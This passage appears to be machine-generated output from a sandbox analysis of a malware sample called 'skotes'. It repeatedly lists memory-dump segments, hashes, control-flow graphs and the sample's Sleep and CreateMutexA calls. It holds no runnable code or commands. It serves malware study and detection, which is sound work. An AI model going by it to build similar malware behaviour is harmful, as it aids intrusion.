                                                                                                                                                                    • Associated: 00000003.00000002.2218447246.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218470005.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218486844.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218502306.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218518931.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218540352.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218558347.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                    • String ID: T2g
                                                                                                                                                                    • API String ID: 1464230837-2857566196
                                                                                                                                                                    • Opcode ID: 7365b70b3a599562db5e86d4e4dab703cedf7a7a93c3bc81e1cf05b7149658c3
                                                                                                                                                                    • Instruction ID: eddfc15d1beeb090e33a62bb9d6302b8696c92bb710743bf4e333bdf457939c8
                                                                                                                                                                    • Opcode Fuzzy Hash: 7365b70b3a599562db5e86d4e4dab703cedf7a7a93c3bc81e1cf05b7149658c3
                                                                                                                                                                    • Instruction Fuzzy Hash: 99310731B121009BEB08EBB8D8CDBEDB663EF85310F28465DE0589B3D5D77589C08766
                                                                                                                                                                    Function 0061A54D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132sleepsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 164 61a54d-61a56d 168 61a59b-61a5b7 164->168 169 61a56f-61a57b 164->169 170 61a5e5-61a604 168->170 171 61a5b9-61a5c5 168->171 172 61a591-61a598 call 62d663 169->172 173 61a57d-61a58b 169->173 176 61a632-61a916 call 6280c0 170->176 177 61a606-61a612 170->177 174 61a5c7-61a5d5 171->174 175 61a5db-61a5e2 call 62d663 171->175 172->168 173->172 178 61a944-61a949 call 646c6a 173->178 174->175 174->178 175->170 182 61a614-61a622 177->182 183 61a628-61a62f call 62d663 177->183 191 61a94e 178->191 192 61a949 call 646c6a 178->192 182->178 182->183 183->176 195 61a953-61a994 Sleep CreateMutexA 191->195 196 61a94e call 646c6a 191->196 192->191 198 61a9a7-61a9a8 195->198 199 61a996-61a998 195->199 196->195 199->198 200 61a99a-61a9a5 199->200 200->198
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNELBASE(00000064), ref: 0061A963
                                                                                                                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,00673254), ref: 0061A981
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.2217401983.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.2217382213.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217401983.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217471342.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217494512.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217517089.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217535783.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217555553.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217698261.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217726300.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217758926.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217758926.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217838870.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217855325.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217870020.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217885416.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217904758.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217921231.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217940900.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217957353.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217985260.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218005496.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218023458.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218044784.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218063307.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218081019.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218100615.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218126040.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218143211.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218195045.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218212854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218231433.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218247857.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218266230.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218283725.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218301395.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218318236.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218334603.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218349887.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218366314.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218391107.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218408668.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218408668.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218447246.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218470005.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218486844.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218502306.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218518931.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218540352.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218558347.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                    • String ID: T2g
                                                                                                                                                                    • API String ID: 1464230837-2857566196
                                                                                                                                                                    • Opcode ID: 0137015d509ac9332f5a91d84d7cb421cf9dc3915975f82569e69f906f174f8c
                                                                                                                                                                    • Instruction ID: 1037ddd0919b48d1c2b98dbe4a5b13931d8abe82319b31c082b00567d13a8411
                                                                                                                                                                    • Opcode Fuzzy Hash: 0137015d509ac9332f5a91d84d7cb421cf9dc3915975f82569e69f906f174f8c
                                                                                                                                                                    • Instruction Fuzzy Hash: E9312831B061008BEB08DBB8DDC9BEDB763EB85314F28465DE0589B3D6C73589C08766
                                                                                                                                                                    Function 0061A682 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131sleepsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 202 61a682-61a6a2 206 61a6d0-61a6ec 202->206 207 61a6a4-61a6b0 202->207 210 61a71a-61a739 206->210 211 61a6ee-61a6fa 206->211 208 61a6b2-61a6c0 207->208 209 61a6c6-61a6cd call 62d663 207->209 208->209 216 61a949 208->216 209->206 214 61a767-61a916 call 6280c0 210->214 215 61a73b-61a747 210->215 212 61a710-61a717 call 62d663 211->212 213 61a6fc-61a70a 211->213 212->210 213->212 213->216 219 61a749-61a757 215->219 220 61a75d-61a764 call 62d663 215->220 221 61a94e 216->221 222 61a949 call 646c6a 216->222 219->216 219->220 220->214 227 61a953-61a994 Sleep CreateMutexA 221->227 228 61a94e call 646c6a 221->228 222->221 234 61a9a7-61a9a8 227->234 235 61a996-61a998 227->235 228->227 235->234 236 61a99a-61a9a5 235->236 236->234
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNELBASE(00000064), ref: 0061A963
                                                                                                                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,00673254), ref: 0061A981
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.2217401983.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.2217382213.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217401983.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217471342.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217494512.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217517089.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217535783.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217555553.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217698261.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217726300.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217758926.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217758926.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217838870.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217855325.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217870020.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217885416.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217904758.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217921231.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217940900.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217957353.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217985260.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218005496.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218023458.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218044784.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218063307.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218081019.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218100615.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218126040.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218143211.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218195045.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218212854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218231433.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218247857.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218266230.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218283725.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218301395.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218318236.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218334603.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218349887.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218366314.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218391107.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218408668.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218408668.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218447246.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218470005.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218486844.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218502306.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218518931.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218540352.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218558347.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                    • String ID: T2g
                                                                                                                                                                    • API String ID: 1464230837-2857566196
                                                                                                                                                                    • Opcode ID: 6743a2c4a64146b8ba94d23141045e4524cce59f0d99e29b69017e2adeb6b369
                                                                                                                                                                    • Instruction ID: 6b5bfcf241d986c508b3608952c489369a23ad7b041b5be71043457389752e02
                                                                                                                                                                    • Opcode Fuzzy Hash: 6743a2c4a64146b8ba94d23141045e4524cce59f0d99e29b69017e2adeb6b369
                                                                                                                                                                    • Instruction Fuzzy Hash: 3B3107317121009BEB089BB8DD897EDB763DB85310F28865DE028DB3E5D7758AC08766
                                                                                                                                                                    Function 00619ADC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107sleepsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 238 619adc-619ae8 239 619aea-619af8 238->239 240 619afe-619d91 call 62d663 call 627a00 call 615c10 call 618b30 call 628220 call 627a00 call 615c10 call 618b30 call 628220 238->240 239->240 241 61a917 239->241 244 61a953-61a994 Sleep CreateMutexA 241->244 245 61a917 call 646c6a 241->245 250 61a9a7-61a9a8 244->250 251 61a996-61a998 244->251 245->244 251->250 253 61a99a-61a9a5 251->253 253->250
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNELBASE(00000064), ref: 0061A963
                                                                                                                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,00673254), ref: 0061A981
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.2217401983.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.2217382213.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217401983.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217471342.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217494512.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217517089.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217535783.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217555553.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217698261.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217726300.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217758926.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217758926.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217838870.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217855325.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217870020.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217885416.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217904758.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217921231.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217940900.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217957353.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217985260.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218005496.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218023458.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218044784.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218063307.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218081019.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218100615.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218126040.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218143211.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218195045.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218212854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218231433.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218247857.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218266230.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218283725.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218301395.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218318236.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218334603.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218349887.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218366314.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218391107.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218408668.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218408668.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218447246.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218470005.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218486844.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218502306.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218518931.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218540352.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218558347.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                    • String ID: T2g
                                                                                                                                                                    • API String ID: 1464230837-2857566196
                                                                                                                                                                    • Opcode ID: 24854da076f6223e0eefc76afa84b5f05b2f3377d0cc51adda83285c2d95d83f
                                                                                                                                                                    • Instruction ID: 9daef84d55be9817f8bf457d18d088497f06569f42f8a2526a547de7a18ce90e
                                                                                                                                                                    • Opcode Fuzzy Hash: 24854da076f6223e0eefc76afa84b5f05b2f3377d0cc51adda83285c2d95d83f
                                                                                                                                                                    • Instruction Fuzzy Hash: A0213A317152009BEB189B68EC897EDB763EBC5310F28465DE41CC77E5DB7559C08B21
                                                                                                                                                                    Function 0061A856 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100sleepsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 306 61a856-61a86e 307 61a870-61a87c 306->307 308 61a89c-61a89e 306->308 311 61a892-61a899 call 62d663 307->311 312 61a87e-61a88c 307->312 309 61a8a0-61a8a7 308->309 310 61a8a9-61a8b1 call 617d30 308->310 313 61a8eb-61a916 call 6280c0 309->313 323 61a8b3-61a8bb call 617d30 310->323 324 61a8e4-61a8e6 310->324 311->308 312->311 315 61a94e 312->315 320 61a953-61a987 Sleep CreateMutexA 315->320 321 61a94e call 646c6a 315->321 326 61a98e-61a994 320->326 321->320 323->324 330 61a8bd-61a8c5 call 617d30 323->330 324->313 328 61a9a7-61a9a8 326->328 329 61a996-61a998 326->329 329->328 331 61a99a-61a9a5 329->331 330->324 335 61a8c7-61a8cf call 617d30 330->335 331->328 335->324 338 61a8d1-61a8d9 call 617d30 335->338 338->324 341 61a8db-61a8e2 338->341 341->313
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNELBASE(00000064), ref: 0061A963
                                                                                                                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,00673254), ref: 0061A981
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.2217401983.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.2217382213.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217401983.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217471342.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217494512.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217517089.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217535783.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217555553.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217698261.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217726300.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217758926.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217758926.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
